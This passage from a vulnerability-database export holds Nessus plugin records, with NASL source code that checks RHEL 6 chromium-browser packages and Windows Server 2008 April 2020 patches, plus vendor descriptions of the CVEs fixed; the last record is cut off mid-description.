(RHSA-2020:0738)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6386", "CVE-2020-6383", "CVE-2020-10531", "CVE-2020-6418", "CVE-2020-6384"], "modified": "2020-03-10T00:00:00", "cpe": ["cpe:/a:redhat:rhel_extras:6", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2020-0738.NASL", "href": "https://www.tenable.com/plugins/nessus/134360", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0738. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134360);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/19\");\n\n script_cve_id(\n \"CVE-2020-10531\",\n \"CVE-2020-6383\",\n \"CVE-2020-6384\",\n \"CVE-2020-6386\",\n \"CVE-2020-6407\",\n \"CVE-2020-6418\"\n );\n script_xref(name:\"RHSA\", value:\"2020:0738\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:0738)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 80.0.3987.122.\n\nSecurity Fix(es) :\n\n* ICU: Integer overflow in UnicodeString::doAppend() (BZ#1807349)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6383)\n\n* chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n* chromium-browser: Use after free in speech (CVE-2020-6386)\n\n* chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6418)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/843.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6407\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807349\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807498\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807499\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807500\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 843);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_extras:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_extras_6': [\n 'rhel-6-desktop-supplementary-debuginfo',\n 'rhel-6-desktop-supplementary-rpms',\n 'rhel-6-desktop-supplementary-source-rpms',\n 'rhel-6-for-hpc-node-supplementary-debuginfo',\n 'rhel-6-for-hpc-node-supplementary-rpms',\n 'rhel-6-for-hpc-node-supplementary-source-rpms',\n 'rhel-6-server-aus-supplementary-debuginfo',\n 'rhel-6-server-aus-supplementary-rpms',\n 'rhel-6-server-aus-supplementary-source-rpms',\n 'rhel-6-server-eus-supplementary-debuginfo',\n 'rhel-6-server-eus-supplementary-rpms',\n 'rhel-6-server-eus-supplementary-source-rpms',\n 'rhel-6-server-supplementary-debuginfo',\n 'rhel-6-server-supplementary-rpms',\n 'rhel-6-server-supplementary-source-rpms',\n 'rhel-6-workstation-supplementary-debuginfo',\n 'rhel-6-workstation-supplementary-rpms',\n 'rhel-6-workstation-supplementary-source-rpms',\n 'rhel-hpc-node-6-eus-supplementary-debug-rpms',\n 'rhel-hpc-node-6-eus-supplementary-rpms',\n 'rhel-hpc-node-6-eus-supplementary-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:0738');\n}\n\npkgs = [\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['rhel_extras_6']},\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['rhel_extras_6']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-18T21:08:45", "description": "The remote Windows host is missing security update 4550957\nor cumulative update 4550951. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-14T00:00:00", "title": "KB4550957: Windows Server 2008 April 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-04-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550951.NASL", "href": "https://www.tenable.com/plugins/nessus/135470", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135470);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550957\");\n script_xref(name:\"MSKB\", value:\"4550951\");\n script_xref(name:\"MSFT\", value:\"MS20-4550957\");\n script_xref(name:\"MSFT\", value:\"MS20-4550951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n\n script_name(english:\"KB4550957: Windows Server 2008 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550957\nor cumulative update 4550951. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\");\n # https://support.microsoft.com/en-us/help/4550957/windows-server-2008-update-kb4550957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e700ec83\");\n # https://support.microsoft.com/en-us/help/4550951/windows-server-2008-update-kb4550951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9a49f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550957 or Cumulative Update KB4550951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0992\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550951', '4550957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550951, 4550957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-18T21:08:44", "description": "The remote Windows host is missing security update 4550971\nor cumulative update 4550917. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects 